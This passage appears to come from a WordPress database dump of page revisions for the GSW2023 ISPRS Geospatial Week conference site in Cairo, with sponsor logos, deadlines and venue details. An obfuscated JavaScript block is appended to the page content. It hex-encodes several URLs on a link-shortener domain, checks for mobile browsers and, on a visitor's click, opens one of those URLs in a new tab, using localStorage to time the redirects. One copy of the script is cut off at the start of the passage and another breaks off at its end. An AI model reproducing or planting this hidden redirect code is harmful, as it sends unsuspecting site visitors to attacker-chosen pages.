_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-13 17:29:33','2023-04-13 17:29:33','',3066,'https://gsw2023.com/?p=4044',0,'revision','',0),
(4052,1,'2023-04-16 20:17:26','2023-04-16 20:17:26','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else 